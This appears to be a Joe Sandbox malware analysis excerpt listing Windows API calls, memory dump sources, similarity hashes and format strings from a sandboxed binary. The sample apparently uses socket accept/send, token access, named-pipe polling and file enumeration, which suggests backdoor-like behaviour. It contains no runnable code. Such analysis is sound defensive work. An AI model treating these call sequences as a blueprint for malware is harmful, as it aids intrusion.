                            • Instruction Fuzzy Hash: 9D1160B6805618BFDB12AF94DC42AEE7B6CEF45350F248466F90896141F731EB418BB1
                            APIs
                            • _malloc.LIBCMT ref: 00DB114F
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                              • Part of subcall function 00DB540D: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000,00002000,?,00DB10EF,00000000,?,00002000,?,00002000,?,?,?,00000000), ref: 00DB541F
                            • _memset.LIBCMT ref: 00DB11A4
                            • _memset.LIBCMT ref: 00DB11B3
                            • _memset.LIBCMT ref: 00DB11CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
                            • String ID:
                            • API String ID: 2041733451-0
                            APIs
                            • _malloc.LIBCMT ref: 00DB114F
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB11A4
                            • _memset.LIBCMT ref: 00DB11B3
                            • _memset.LIBCMT ref: 00DB11CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: _memset$AllocateHeap_malloc
                            • String ID:
                            • API String ID: 1114209484-0
                            APIs
                            • _malloc.LIBCMT ref: 00D7054F
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                            • _memset.LIBCMT ref: 00D705A4
                            • _memset.LIBCMT ref: 00D705B3
                            • _memset.LIBCMT ref: 00D705CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: _memset$_malloc
                            • String ID:
                            • API String ID: 3506388080-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: _memset
                            • String ID:
                            • API String ID: 2102423945-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: _memset
                            • String ID:
                            • API String ID: 2102423945-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: _clock
                            • String ID:
                            • API String ID: 876827150-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: _clock
                            • String ID:
                            • API String ID: 876827150-0
                            APIs
                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00DB16C4), ref: 00DBDE84
                            • ExitThread.KERNEL32 ref: 00DBDE8E
                            • WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00DB16C4), ref: 00DBDEAF
                            • ExitProcess.KERNEL32 ref: 00DBDEBB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: Exit$ObjectProcessSingleSleepThreadWait
                            • String ID:
                            • API String ID: 2040395460-0
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 00DBE0AE
                            • OpenThreadToken.ADVAPI32(00000000), ref: 00DBE0B5
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00DBE0C5
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00DBE0CC
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            APIs
                            • accept.WS2_32(?,00000000,00000000), ref: 00DBED5D
                            • send.WS2_32(00000000,?,?,00000000), ref: 00DBED8A
                            • send.WS2_32(00000000,?,?,00000000), ref: 00DBED98
                            • closesocket.WS2_32(00000000), ref: 00DBEDA3
                              • Part of subcall function 00DBECDF: closesocket.WS2_32(?), ref: 00DBECE1
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: closesocketsend$accept
                            • String ID:
                            • API String ID: 2168303407-0
                            APIs
                            • InitializeProcThreadAttributeList.KERNEL32(00000000,00DB9286,00000000,00000000,?,?,?,?,?,00DB9286,00000000), ref: 00DB91FD
                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00DB9286,00000000), ref: 00DB9203
                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00DB9286,00000000), ref: 00DB920A
                            • InitializeProcThreadAttributeList.KERNEL32(00000000,00DB9286,00000000,00000000,?,?,?,?,00DB9286,00000000), ref: 00DB921F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                            • String ID:
                            • API String ID: 1212816094-0
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB72CA
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00DB72DE
                            • Sleep.KERNEL32(000001F4), ref: 00DB72F2
                            • GetTickCount.KERNEL32 ref: 00DB72F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: CountTick$NamedPeekPipeSleep
                            • String ID:
                            • API String ID: 1593283408-0
                            APIs
                            • __getptd.LIBCMT ref: 00DD1296
                              • Part of subcall function 00DCD797: __getptd_noexit.LIBCMT ref: 00DCD79A
                              • Part of subcall function 00DCD797: __amsg_exit.LIBCMT ref: 00DCD7A7
                            • __getptd.LIBCMT ref: 00DD12AD
                            • __amsg_exit.LIBCMT ref: 00DD12BB
                            • __lock.LIBCMT ref: 00DD12CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            APIs
                            • __getptd.LIBCMT ref: 00D90696
                              • Part of subcall function 00D8CB97: __getptd_noexit.LIBCMT ref: 00D8CB9A
                              • Part of subcall function 00D8CB97: __amsg_exit.LIBCMT ref: 00D8CBA7
                            • __getptd.LIBCMT ref: 00D906AD
                            • __amsg_exit.LIBCMT ref: 00D906BB
                            • __lock.LIBCMT ref: 00D906CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: _memset
                            • String ID: l.dl$ntdl
                            • API String ID: 2102423945-1236859653
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: _memset
                            • String ID: l.dl$ntdl
                            • API String ID: 2102423945-1236859653
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: __snprintf
                            • String ID: %c%c%c%c
                            • API String ID: 2633826957-103593547
                            APIs
                            • _malloc.LIBCMT ref: 00DB5058
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • __snprintf.LIBCMT ref: 00DB506C
                              • Part of subcall function 00DC9D8A: RemoveDirectoryA.KERNEL32(00DB5080,?,00DB5080,00000000), ref: 00DC9D92
                              • Part of subcall function 00DC9D8A: GetLastError.KERNEL32(?,00DB5080,00000000), ref: 00DC9D9C
                              • Part of subcall function 00DC9D8A: __dosmaperr.LIBCMT ref: 00DC9DAB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Similarity
                            • API ID: AllocateDirectoryErrorHeapLastRemove__dosmaperr__snprintf_malloc
                            • String ID: %s\%s
                            • API String ID: 47932920-4073750446
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: __snprintf_memset
                            • String ID: %s%s: %s
                            • API String ID: 2657849664-533130479
                            APIs
                            • _malloc.LIBCMT ref: 00DBA6DC
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • __snprintf.LIBCMT ref: 00DBA6F0
                              • Part of subcall function 00DBA70E: _malloc.LIBCMT ref: 00DBA71B
                              • Part of subcall function 00DBA70E: __snprintf.LIBCMT ref: 00DBA72C
                              • Part of subcall function 00DBA70E: FindFirstFileA.KERNEL32(00000000,00DB50C9,?,00DBA7FD,00DB50C9,?,Function_0000504D), ref: 00DBA739
                              • Part of subcall function 00DBA70E: _malloc.LIBCMT ref: 00DBA778
                              • Part of subcall function 00DBA70E: __snprintf.LIBCMT ref: 00DBA78D
                              • Part of subcall function 00DBA70E: FindNextFileA.KERNEL32(000000FF,00DB50C9,?,?,?,?,?,?,?), ref: 00DBA7BA
                              • Part of subcall function 00DBA70E: FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 00DBA7C7
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                            • String ID: %s\%s
                            • API String ID: 1254174322-4073750446
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Similarity
                            • API ID: __snprintf_memset
                            • String ID: %s%s
                            • API String ID: 2657849664-3438391663
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022CE
                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022F5
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022FC
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 0040231C
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                            • String ID:
                            • API String ID: 682475483-0